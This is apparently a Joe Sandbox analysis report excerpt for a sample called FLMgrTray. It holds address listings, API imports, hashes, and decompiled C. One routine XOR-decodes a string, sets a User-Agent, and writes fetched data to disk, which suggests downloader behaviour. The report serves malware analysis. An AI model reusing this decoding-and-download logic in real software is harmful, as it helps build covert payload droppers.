                                                                                        0x0016a5cc
                                                                                        0x00000000
                                                                                        0x0016a70f
                                                                                        0x0016a712
                                                                                        0x0016a713
                                                                                        0x0016a716
                                                                                        0x00000000
                                                                                        0x0016a43b
                                                                                        0x0016a345
                                                                                        0x0016a345
                                                                                        0x0016a348
                                                                                        0x0016a34a
                                                                                        0x00000000
                                                                                        0x0016a350
                                                                                        0x0016a350
                                                                                        0x0016a41f
                                                                                        0x0016a428
                                                                                        0x0016a428
                                                                                        0x00000000
                                                                                        0x0016a356
                                                                                        0x0016a35d
                                                                                        0x0016a363
                                                                                        0x0016a735
                                                                                        0x0016a735
                                                                                        0x0016a73a
                                                                                        0x0016a73b
                                                                                        0x0016a73c
                                                                                        0x0016a73d
                                                                                        0x0016a73e
                                                                                        0x0016a73f
                                                                                        0x0016a740
                                                                                        0x0016a741
                                                                                        0x0016a743
                                                                                        0x0016a748
                                                                                        0x0016a74e
                                                                                        0x0016a75c
                                                                                        0x0016a75f
                                                                                        0x0016a76c
                                                                                        0x0016a74a
                                                                                        0x0016a74a
                                                                                        0x0016a74a
                                                                                        0x0016a771
                                                                                        0x0016a775
                                                                                        0x0016a779
                                                                                        0x0016a77f
                                                                                        0x0016a788
                                                                                        0x0016a78e
                                                                                        0x0016a791
                                                                                        0x0016a798
                                                                                        0x0016a79b
                                                                                        0x0016a7a3
                                                                                        0x0016a369
                                                                                        0x0016a36b
                                                                                        0x0016a374
                                                                                        0x0016a384
                                                                                        0x0016a38a
                                                                                        0x0016a398
                                                                                        0x0016a38c
                                                                                        0x0016a38c
                                                                                        0x0016a38c
                                                                                        0x0016a376
                                                                                        0x0016a376
                                                                                        0x0016a376
                                                                                        0x0016a39b
                                                                                        0x0016a3a9
                                                                                        0x0016a3ab
                                                                                        0x0016a3ae
                                                                                        0x0016a3b4
                                                                                        0x0016a3bb
                                                                                        0x0016a3bf
                                                                                        0x0016a405
                                                                                        0x0016a407
                                                                                        0x0016a40f
                                                                                        0x0016a412
                                                                                        0x0016a417
                                                                                        0x0016a3c1
                                                                                        0x0016a3c1
                                                                                        0x0016a3c5
                                                                                        0x0016a3ca
                                                                                        0x0016a3cb
                                                                                        0x0016a3d4
                                                                                        0x0016a3e8
                                                                                        0x0016a3e8
                                                                                        0x0016a3ea
                                                                                        0x0016a3f2
                                                                                        0x0016a3f5
                                                                                        0x0016a3fa
                                                                                        0x0016a3d6
                                                                                        0x0016a3d6
                                                                                        0x0016a3d9
                                                                                        0x0016a3dc
                                                                                        0x0016a3de
                                                                                        0x0016a3de
                                                                                        0x0016a3e4
                                                                                        0x0016a3ff
                                                                                        0x0016a3ff
                                                                                        0x00000000
                                                                                        0x0016a3e6
                                                                                        0x0016a3e6
                                                                                        0x00000000
                                                                                        0x0016a3e6
                                                                                        0x0016a3e4
                                                                                        0x0016a3d4
                                                                                        0x00000000
                                                                                        0x0016a3bf
                                                                                        0x0016a363
                                                                                        0x0016a350
                                                                                        0x0016a34a
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000001,?,2C80D730), ref: 0016A3C5
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0016A3FF
                                                                                        • memcpy.VCRUNTIME140(?,?), ref: 0016A407
                                                                                        • memcpy.VCRUNTIME140(00000000,00000001,00000000,2C80D730), ref: 0016A539
                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000,2C80D730), ref: 0016A58A
                                                                                        • memcpy.VCRUNTIME140(00000000,00000001,00000000), ref: 0016A69B
                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 0016A6EC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memcpy$_invalid_parameter_noinfo_noreturn
                                                                                        • String ID:
                                                                                        • API String ID: 2665656946-0
                                                                                        • Opcode ID: 0b21ed5a135f450f9a6924e82f71c10f64584fddd97fe88f2e1f52c546fb446d
                                                                                        • Instruction ID: fdbf02c187d6e1918bb14df54a11dd58a5e687966605527d17ed03b2cfe83b0c
                                                                                        • Opcode Fuzzy Hash: 0b21ed5a135f450f9a6924e82f71c10f64584fddd97fe88f2e1f52c546fb446d
                                                                                        • Instruction Fuzzy Hash: C7D104716042458FC714DF28CC946BEBBF6FF45310BA84729E466A7381E770A954CFA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 41%
                                                                                        			E00174F20() {
                                                                                        				intOrPtr _v8;
                                                                                        				int _v16;
                                                                                        				char _v24;
                                                                                        				signed int _v32;
                                                                                        				intOrPtr _v36;
                                                                                        				struct _IO_FILE* _v40;
                                                                                        				char _v56;
                                                                                        				intOrPtr _v60;
                                                                                        				struct _IO_FILE* _v64;
                                                                                        				char _v80;
                                                                                        				intOrPtr _v84;
                                                                                        				struct _IO_FILE* _v88;
                                                                                        				char _v104;
                                                                                        				intOrPtr _v140;
                                                                                        				intOrPtr _v196;
                                                                                        				intOrPtr _v200;
                                                                                        				char _v216;
                                                                                        				char _v220;
                                                                                        				void _v340;
                                                                                        				char _v341;
                                                                                        				struct _IO_FILE* _v348;
                                                                                        				struct _IO_FILE* _v352;
                                                                                        				void* _v356;
                                                                                        				struct _IO_FILE* _v364;
                                                                                        				struct _IO_FILE* _v368;
                                                                                        				void* _v372;
                                                                                        				void* _v376;
                                                                                        				intOrPtr _v380;
                                                                                        				intOrPtr _v384;
                                                                                        				char _v404;
                                                                                        				struct _IO_FILE* _v416;
                                                                                        				char _v420;
                                                                                        				intOrPtr _v428;
                                                                                        				void* __ebx;
                                                                                        				void* __edi;
                                                                                        				void* __esi;
                                                                                        				void* __ebp;
                                                                                        				signed int _t116;
                                                                                        				signed int _t117;
                                                                                        				void* _t121;
                                                                                        				intOrPtr _t132;
                                                                                        				void* _t137;
                                                                                        				struct _IO_FILE* _t168;
                                                                                        				intOrPtr _t172;
                                                                                        				intOrPtr _t175;
                                                                                        				void* _t181;
                                                                                        				signed int _t184;
                                                                                        				intOrPtr* _t186;
                                                                                        				intOrPtr _t211;
                                                                                        				char _t212;
                                                                                        				void* _t217;
                                                                                        				intOrPtr _t218;
                                                                                        				intOrPtr _t219;
                                                                                        				void* _t220;
                                                                                        				void* _t221;
                                                                                        				void* _t228;
                                                                                        				char _t232;
                                                                                        				intOrPtr _t234;
                                                                                        				int _t238;
                                                                                        				signed int _t241;
                                                                                        				void* _t243;
                                                                                        				signed int _t246;
                                                                                        				void* _t248;
                                                                                        				void* _t249;
                                                                                        				void* _t252;
                                                                                        
                                                                                        				_t181 = _t243;
                                                                                        				_t246 = (_t243 - 0x00000008 & 0xfffffff0) + 4;
                                                                                        				_v8 =  *((intOrPtr*)(_t181 + 4));
                                                                                        				_t241 = _t246;
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018DA7F);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_push(_t181);
                                                                                        				_t116 =  *0x19d05c; // 0x2c80d730
                                                                                        				_t117 = _t116 ^ _t241;
                                                                                        				_v32 = _t117;
                                                                                        				_push(_t117);
                                                                                        				 *[fs:0x0] =  &_v24;
                                                                                        				_v348 =  *((intOrPtr*)(_t181 + 8));
                                                                                        				_t121 = memcpy( &_v340, 0x190348, 0x1d << 2);
                                                                                        				_t248 = _t246 - 0x198 + 0xc;
                                                                                        				asm("xorps xmm0, xmm0");
                                                                                        				_v376 = _t121;
                                                                                        				_t184 = 0;
                                                                                        				asm("movlpd [ebp-0x168], xmm0");
                                                                                        				if( *0x19dc40 < 2) {
                                                                                        					do {
                                                                                        						L4:
                                                                                        						_t216 = (_t184 + (0xa0a0a0a1 * _t184 >> 0x20) >> 5 >> 0x1f) + (_t184 + (0xa0a0a0a1 * _t184 >> 0x20) >> 5);
                                                                                        						 *(_t241 + _t184 - 0x148) =  *(_t241 + _t184 - 0x148) ^ 0x33 + _t184;
                                                                                        						_t184 = _t184 + 1;
                                                                                        					} while (_t184 < 0x74);
                                                                                        					L5:
                                                                                        					_v88 = 0;
                                                                                        					_v84 = 0xf;
                                                                                        					_v104 = 0;
                                                                                        					E00163450(_t181, _t216, 0x190382, "User-Agent", 0xa);
                                                                                        					_t186 =  &_v340;
                                                                                        					_v16 = 0;
                                                                                        					_v64 = 0;
                                                                                        					_t217 = _t186 + 1;
                                                                                        					_v60 = 0xf;
                                                                                        					_v80 = 0;
                                                                                        					do {
                                                                                        						_t132 =  *_t186;
                                                                                        						_t186 = _t186 + 1;
                                                                                        						_t258 = _t132;
                                                                                        					} while (_t132 != 0);
                                                                                        					E00163450(_t181, _t217, 0x190382,  &_v340, _t186 - _t217);
                                                                                        					_v16 = 1;
                                                                                        					_v380 = E0016C460( &_v356,  &_v104,  &_v56);
                                                                                        					_v16 = 2;
                                                                                        					_t137 = E001622D0( &_v56, _v348);
                                                                                        					_v420 = _v372;
                                                                                        					_v416 = _v368;
                                                                                        					_v16 = 3;
                                                                                        					_t226 = E00168500( &_v341, 0);
                                                                                        					E00166E10(_t181, _t138, _t258);
                                                                                        					_v16 = 4;
                                                                                        					E00167650( &_v348, _t137);
                                                                                        					E00167640(_t181,  &_v348, _v380);
                                                                                        					E00167680( &_v348,  &_v420);
                                                                                        					E001676B0( &_v348, _t138);
                                                                                        					E001672B0( &_v348,  &_v220);
                                                                                        					E00167290(_t181,  &_v348, _t138);
                                                                                        					_t218 = _v36;
                                                                                        					_v16 = 6;
                                                                                        					if(_t218 >= 0x10) {
                                                                                        						_t212 = _v56;
                                                                                        						_t221 = _t218 + 1;
                                                                                        						_t175 = _t212;
                                                                                        						if(_t221 >= 0x1000) {
                                                                                        							_t212 =  *((intOrPtr*)(_t212 - 4));
                                                                                        							_t221 = _t221 + 0x23;
                                                                                        							if(_t175 > 0x1f) {
                                                                                        								__imp___invalid_parameter_noinfo_noreturn();
                                                                                        							}
                                                                                        						}
                                                                                        						_push(_t221);
                                                                                        						E00175733(_t175, _t212);
                                                                                        						_t248 = _t248 + 8;
                                                                                        					}
                                                                                        					_v40 = 0;
                                                                                        					_v36 = 0xf;
                                                                                        					_v56 = 0;
                                                                                        					_t232 = _v356;
                                                                                        					_v16 = 8;
                                                                                        					E00167760(_t181,  &_v356, _t226, _t232,  *((intOrPtr*)(_t232 + 4)));
                                                                                        					_push(0x40);
                                                                                        					 *((intOrPtr*)(_v356 + 4)) = _t232;
                                                                                        					 *_v356 = _t232;
                                                                                        					 *((intOrPtr*)(_v356 + 8)) = _t232;
                                                                                        					_v352 = 0;
                                                                                        					E00175733(_v356, _v356);
                                                                                        					_t249 = _t248 + 8;
                                                                                        					_push(E00165430);
                                                                                        					_push(1);
                                                                                        					_push(0x30);
                                                                                        					_v16 = 9;
                                                                                        					_push( &_v104);
                                                                                        					E00175605();
                                                                                        					if(_v140 != 0 || _v220 + 0xffffff38 > 6) {
                                                                                        						L23:
                                                                                        						_v341 = 0;
                                                                                        						goto L24;
                                                                                        					} else {
                                                                                        						_t234 = _v200;
                                                                                        						if(_t234 <= 0x80) {
                                                                                        							goto L23;
                                                                                        						}
                                                                                        						_t161 =  >=  ? _v216 :  &_v216;
                                                                                        						_t162 = ( >=  ? _v216 :  &_v216) + _t234;
                                                                                        						_v372 = 0;
                                                                                        						_t236 =  >=  ? _v216 :  &_v216;
                                                                                        						_v368 = 0;
                                                                                        						_v364 = 0;
                                                                                        						E0016C360( &_v372, _v196 - 0x10,  >=  ? _v216 :  &_v216, ( >=  ? _v216 :  &_v216) + _t234);
                                                                                        						_t228 = _v372;
                                                                                        						_t238 = _v368 - _t228;
                                                                                        						_v16 = 0xa;
                                                                                        						E001622D0( &_v404, _v376);
                                                                                        						_t166 =  >=  ? _v404 :  &_v404;
                                                                                        						_v348 = 0;
                                                                                        						__imp__fopen_s( &_v348,  >=  ? _v404 :  &_v404, 0x190344, _v376);
                                                                                        						_t168 = _v348;
                                                                                        						_t252 = _t249 + 0xc;
                                                                                        						if(_t168 != 0) {
                                                                                        							L20:
                                                                                        							fwrite(_t228, 1, _t238, _t168);
                                                                                        							fclose(_v348);
                                                                                        							_t252 = _t252 + 0x14;
                                                                                        						}
                                                                                        						_t219 = _v384;
                                                                                        						if(_t219 < 0x10) {
                                                                                        							L22:
                                                                                        							E0016C650(_t181,  &_v372);
                                                                                        							_v341 = 1;
                                                                                        							L24:
                                                                                        							E0016C920(_t181,  &_v220);
                                                                                        							 *[fs:0x0] = _v24;
                                                                                        							__eflags = _v32 ^ _t241;
                                                                                        							return E001755F4(_v32 ^ _t241);
                                                                                        						}
                                                                                        						_t211 = _v404;
                                                                                        						_t220 = _t219 + 1;
                                                                                        						_t172 = _t211;
                                                                                        						if(_t220 < 0x1000) {
                                                                                        							L21:
                                                                                        							_push(_t220);
                                                                                        							E00175733(_t172, _t211);
                                                                                        							goto L22;
                                                                                        						}
                                                                                        						_t211 =  *((intOrPtr*)(_t211 - 4));
                                                                                        						_t220 = _t220 + 0x23;
                                                                                        						if(_t172 <= 0x1f) {
                                                                                        							goto L21;
                                                                                        						}
                                                                                        						__imp___invalid_parameter_noinfo_noreturn();
                                                                                        						goto L20;
                                                                                        					}
                                                                                        				}
                                                                                        				asm("movaps xmm0, [0x190d20]");
                                                                                        				asm("movaps xmm4, [0x18ffd0]");
                                                                                        				asm("movaps xmm3, [0x190d30]");
                                                                                        				asm("movaps xmm6, [0x190d00]");
                                                                                        				asm("movd xmm5, eax");
                                                                                        				asm("movaps [ebp-0x1a0], xmm0");
                                                                                        				_t216 = _v428;
                                                                                        				asm("movd xmm7, eax");
                                                                                        				asm("o16 nop [eax+eax]");
                                                                                        				do {
                                                                                        					asm("movd xmm0, ecx");
                                                                                        					asm("pshufd xmm2, xmm0, 0x0");
                                                                                        					asm("paddd xmm2, xmm4");
                                                                                        					asm("movaps xmm1, xmm2");
                                                                                        					asm("movaps xmm0, xmm2");
                                                                                        					asm("punpckhdq xmm0, xmm2");
                                                                                        					asm("punpckldq xmm1, xmm2");
                                                                                        					asm("pmuldq xmm0, xmm3");
                                                                                        					asm("pmuldq xmm1, xmm3");
                                                                                        					asm("shufps xmm1, xmm0, 0xdd");
                                                                                        					asm("paddd xmm1, xmm2");
                                                                                        					asm("psrad xmm1, xmm5");
                                                                                        					asm("movaps xmm0, xmm1");
                                                                                        					asm("psrld xmm0, xmm7");
                                                                                        					asm("paddd xmm0, xmm1");
                                                                                        					asm("pmulld xmm0, xmm6");
                                                                                        					asm("psubd xmm2, xmm0");
                                                                                        					asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        					asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        					asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        					asm("pand xmm1, [0x190d10]");
                                                                                        					asm("packuswb xmm1, xmm1");
                                                                                        					asm("movd xmm0, edx");
                                                                                        					asm("paddb xmm1, xmm0");
                                                                                        					asm("movd xmm0, dword [ebp+ecx-0x148]");
                                                                                        					asm("pxor xmm1, xmm0");
                                                                                        					asm("movd xmm0, eax");
                                                                                        					asm("pshufd xmm2, xmm0, 0x0");
                                                                                        					asm("movd [ebp+ecx-0x148], xmm1");
                                                                                        					asm("paddd xmm2, xmm4");
                                                                                        					asm("movaps xmm1, xmm2");
                                                                                        					asm("movaps xmm0, xmm2");
                                                                                        					asm("punpckldq xmm1, xmm2");
                                                                                        					asm("punpckhdq xmm0, xmm2");
                                                                                        					asm("pmuldq xmm0, xmm3");
                                                                                        					asm("pmuldq xmm1, xmm3");
                                                                                        					asm("shufps xmm1, xmm0, 0xdd");
                                                                                        					asm("paddd xmm1, xmm2");
                                                                                        					asm("psrad xmm1, xmm5");
                                                                                        					asm("movaps xmm0, xmm1");
                                                                                        					asm("psrld xmm0, xmm7");
                                                                                        					asm("paddd xmm0, xmm1");
                                                                                        					asm("pmulld xmm0, xmm6");
                                                                                        					asm("psubd xmm2, xmm0");
                                                                                        					asm("pshuflw xmm0, xmm2, 0xd8");
                                                                                        					asm("pshufhw xmm0, xmm0, 0xd8");
                                                                                        					asm("pshufd xmm1, xmm0, 0xd8");
                                                                                        					asm("pand xmm1, [0x190d10]");
                                                                                        					asm("packuswb xmm1, xmm1");
                                                                                        					asm("movd xmm0, edx");
                                                                                        					asm("paddb xmm1, xmm0");
                                                                                        					asm("movd xmm0, dword [ebp+ecx-0x144]");
                                                                                        					asm("pxor xmm1, xmm0");
                                                                                        					asm("movd [ebp+ecx-0x144], xmm1");
                                                                                        					_t184 = _t184 + 8;
                                                                                        				} while (_t184 < 0x70);
                                                                                        				if(_t184 >= 0x74) {
                                                                                        					goto L5;
                                                                                        				}
                                                                                        				goto L4;
                                                                                        			}




































































                                                                                        0x00174f21
                                                                                        0x00174f29
                                                                                        0x00174f30
                                                                                        0x00174f34
                                                                                        0x00174f36
                                                                                        0x00174f38
                                                                                        0x00174f43
                                                                                        0x00174f44
                                                                                        0x00174f4b
                                                                                        0x00174f50
                                                                                        0x00174f52
                                                                                        0x00174f57
                                                                                        0x00174f5b
                                                                                        0x00174f6f
                                                                                        0x00174f7d
                                                                                        0x00174f7d
                                                                                        0x00174f7f
                                                                                        0x00174f82
                                                                                        0x00174f88
                                                                                        0x00174f8a
                                                                                        0x00174f99
                                                                                        0x001750f0
                                                                                        0x001750f0
                                                                                        0x00175102
                                                                                        0x00175110
                                                                                        0x00175117
                                                                                        0x00175118
                                                                                        0x0017511d
                                                                                        0x00175127
                                                                                        0x0017512e
                                                                                        0x00175135
                                                                                        0x00175139
                                                                                        0x0017513e
                                                                                        0x00175144
                                                                                        0x0017514b
                                                                                        0x00175152
                                                                                        0x00175155
                                                                                        0x0017515c
                                                                                        0x00175160
                                                                                        0x00175160
                                                                                        0x00175162
                                                                                        0x00175163
                                                                                        0x00175163
                                                                                        0x00175174
                                                                                        0x0017517c
                                                                                        0x00175193
                                                                                        0x001751a2
                                                                                        0x001751a6
                                                                                        0x001751b3
                                                                                        0x001751bf
                                                                                        0x001751cd
                                                                                        0x001751dc
                                                                                        0x001751de
                                                                                        0x001751ea
                                                                                        0x001751ee
                                                                                        0x001751ff
                                                                                        0x00175211
                                                                                        0x0017521d
                                                                                        0x0017522f
                                                                                        0x0017523a
                                                                                        0x0017523f
                                                                                        0x00175242
                                                                                        0x00175249
                                                                                        0x0017524b
                                                                                        0x0017524e
                                                                                        0x0017524f
                                                                                        0x00175257
                                                                                        0x00175259
                                                                                        0x0017525c
                                                                                        0x00175267
                                                                                        0x00175269
                                                                                        0x00175269
                                                                                        0x00175267
                                                                                        0x0017526f
                                                                                        0x00175271
                                                                                        0x00175276
                                                                                        0x00175276
                                                                                        0x00175279
                                                                                        0x00175280
                                                                                        0x00175287
                                                                                        0x0017528b
                                                                                        0x00175297
                                                                                        0x0017529e
                                                                                        0x001752a9
                                                                                        0x001752ab
                                                                                        0x001752b4
                                                                                        0x001752bc
                                                                                        0x001752c5
                                                                                        0x001752cf
                                                                                        0x001752d4
                                                                                        0x001752d7
                                                                                        0x001752dc
                                                                                        0x001752de
                                                                                        0x001752e3
                                                                                        0x001752e7
                                                                                        0x001752e8
                                                                                        0x001752f1
                                                                                        0x00175445
                                                                                        0x00175445
                                                                                        0x00000000
                                                                                        0x0017530b
                                                                                        0x0017530b
                                                                                        0x00175317
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00175330
                                                                                        0x0017533d
                                                                                        0x0017533f
                                                                                        0x00175357
                                                                                        0x0017535f
                                                                                        0x00175369
                                                                                        0x00175373
                                                                                        0x0017538a
                                                                                        0x00175390
                                                                                        0x00175392
                                                                                        0x00175396
                                                                                        0x001753ad
                                                                                        0x001753bb
                                                                                        0x001753c6
                                                                                        0x001753cc
                                                                                        0x001753d2
                                                                                        0x001753d7
                                                                                        0x0017540b
                                                                                        0x00175410
                                                                                        0x0017541c
                                                                                        0x00175422
                                                                                        0x00175422
                                                                                        0x001753d9
                                                                                        0x001753e2
                                                                                        0x00175431
                                                                                        0x00175437
                                                                                        0x0017543c
                                                                                        0x0017544c
                                                                                        0x00175452
                                                                                        0x00175460
                                                                                        0x0017546d
                                                                                        0x0017547a
                                                                                        0x0017547a
                                                                                        0x001753e4
                                                                                        0x001753ea
                                                                                        0x001753eb
                                                                                        0x001753f3
                                                                                        0x00175427
                                                                                        0x00175427
                                                                                        0x00175429
                                                                                        0x00000000
                                                                                        0x0017542e
                                                                                        0x001753f5
                                                                                        0x001753f8
                                                                                        0x00175403
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00175405
                                                                                        0x00000000
                                                                                        0x00175405
                                                                                        0x001752f1
                                                                                        0x00174f9f
                                                                                        0x00174fab
                                                                                        0x00174fb2
                                                                                        0x00174fb9
                                                                                        0x00174fc0
                                                                                        0x00174fc9
                                                                                        0x00174fd0
                                                                                        0x00174fd6
                                                                                        0x00174fda
                                                                                        0x00174fe0
                                                                                        0x00174fe0
                                                                                        0x00174fe7
                                                                                        0x00174fec
                                                                                        0x00174ff0
                                                                                        0x00174ff3
                                                                                        0x00174ff6
                                                                                        0x00174ffa
                                                                                        0x00174ffe
                                                                                        0x00175003
                                                                                        0x00175008
                                                                                        0x0017500c
                                                                                        0x00175010
                                                                                        0x00175014
                                                                                        0x00175017
                                                                                        0x0017501b
                                                                                        0x0017501f
                                                                                        0x00175024
                                                                                        0x00175028
                                                                                        0x0017502d
                                                                                        0x00175032
                                                                                        0x00175037
                                                                                        0x0017503f
                                                                                        0x00175043
                                                                                        0x00175047
                                                                                        0x0017504b
                                                                                        0x00175054
                                                                                        0x00175058
                                                                                        0x0017505c
                                                                                        0x00175061
                                                                                        0x0017506a
                                                                                        0x0017506e
                                                                                        0x00175071
                                                                                        0x00175074
                                                                                        0x00175078
                                                                                        0x0017507c
                                                                                        0x00175081
                                                                                        0x00175086
                                                                                        0x0017508a
                                                                                        0x0017508e
                                                                                        0x00175092
                                                                                        0x00175095
                                                                                        0x00175099
                                                                                        0x0017509d
                                                                                        0x001750a2
                                                                                        0x001750a6
                                                                                        0x001750ab
                                                                                        0x001750b0
                                                                                        0x001750b5
                                                                                        0x001750bd
                                                                                        0x001750c1
                                                                                        0x001750c5
                                                                                        0x001750c9
                                                                                        0x001750d2
                                                                                        0x001750d6
                                                                                        0x001750df
                                                                                        0x001750e2
                                                                                        0x001750ee
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,00000000,?,00000000,?,?,?,User-Agent,0000000A,2C80D730,?), ref: 00175269
                                                                                        • fopen_s.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,00190344,?,?,?,?,00000000,00000030,00000001,Function_00005430,?), ref: 001753C6
                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00175405
                                                                                        • fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,00000000), ref: 00175410
                                                                                        • fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 0017541C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: _invalid_parameter_noinfo_noreturn$fclosefopen_sfwrite
                                                                                        • String ID: User-Agent
                                                                                        • API String ID: 1662867619-205514715
                                                                                        • Opcode ID: 89ac47ab474a86242dc8778b4bac045193d99c23b90195a5f6a33412d0709b47
                                                                                        • Instruction ID: 5b1027222a73f5670f65c330b2a3b9fb37cec0238285c0e4399bdb60bd9a8540
                                                                                        • Opcode Fuzzy Hash: 89ac47ab474a86242dc8778b4bac045193d99c23b90195a5f6a33412d0709b47
                                                                                        • Instruction Fuzzy Hash: 9DE1CA31C146588FEB22DB74CC45BDDB7B4AF6A305F10839AE80977292EB716AC58F50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,2C80D730,?,2C80D730,?,?,?,?,?,00000000,0018E731,000000FF,?,00184F7B), ref: 001848DD
                                                                                        • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 001848F8
                                                                                        • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140 ref: 0018491F
                                                                                        • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?), ref: 0018493F
                                                                                        • std::_Facet_Register.LIBCPMT ref: 00184958
                                                                                        • ??1_Lockit@std@@QAE@XZ.MSVCP140 ref: 00184973
                                                                                        • _CxxThrowException.VCRUNTIME140(00199B00,00199B00), ref: 0018499E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@ExceptionFacet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterThrowV42@@Vfacet@locale@2@std::_
                                                                                        • String ID:
                                                                                        • API String ID: 3546165850-0
                                                                                        • Opcode ID: 982fdaeb322774ee74507e00f834ef55edd342b6855c71845723fe3096c2017e
                                                                                        • Instruction ID: f7b365d537f6308416664425b6111bbd0b69df4010814f9e24a322ab6f0d5711
                                                                                        • Opcode Fuzzy Hash: 982fdaeb322774ee74507e00f834ef55edd342b6855c71845723fe3096c2017e
                                                                                        • Instruction Fuzzy Hash: 9D317175D00225DFCB20EF58D844AAEB7B8FB08724F15459AE815A7751DB30AE41CFE1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 59%
                                                                                        			E00185440(void* __ecx) {
                                                                                        				intOrPtr _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				intOrPtr _v24;
                                                                                        				char _v28;
                                                                                        				char _v44;
                                                                                        				char _v45;
                                                                                        				char _v52;
                                                                                        				char _v56;
                                                                                        				void* __ebx;
                                                                                        				void* __ebp;
                                                                                        				signed int _t63;
                                                                                        				signed int _t64;
                                                                                        				int _t68;
                                                                                        				intOrPtr _t71;
                                                                                        				int _t76;
                                                                                        				void* _t85;
                                                                                        				void* _t100;
                                                                                        				intOrPtr _t104;
                                                                                        				intOrPtr _t109;
                                                                                        				intOrPtr _t110;
                                                                                        				intOrPtr _t116;
                                                                                        				intOrPtr _t118;
                                                                                        				void* _t119;
                                                                                        				intOrPtr* _t124;
                                                                                        				void* _t127;
                                                                                        				void* _t135;
                                                                                        				intOrPtr _t137;
                                                                                        				signed int _t138;
                                                                                        				void* _t139;
                                                                                        				void* _t140;
                                                                                        				void* _t141;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E7F8);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t140 = _t139 - 0x28;
                                                                                        				_t63 =  *0x19d05c; // 0x2c80d730
                                                                                        				_t64 = _t63 ^ _t138;
                                                                                        				_v20 = _t64;
                                                                                        				_push(_t64);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_t127 = __ecx;
                                                                                        				_t104 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c))));
                                                                                        				if(_t104 == 0) {
                                                                                        					L3:
                                                                                        					if( *(_t127 + 0x4c) != 0) {
                                                                                        						_t130 =  *((intOrPtr*)(_t127 + 0xc));
                                                                                        						if( *_t130 == _t127 + 0x3c) {
                                                                                        							_t116 =  *((intOrPtr*)(_t127 + 0x50));
                                                                                        							 *_t130 = _t116;
                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t127 + 0x1c)))) = _t116;
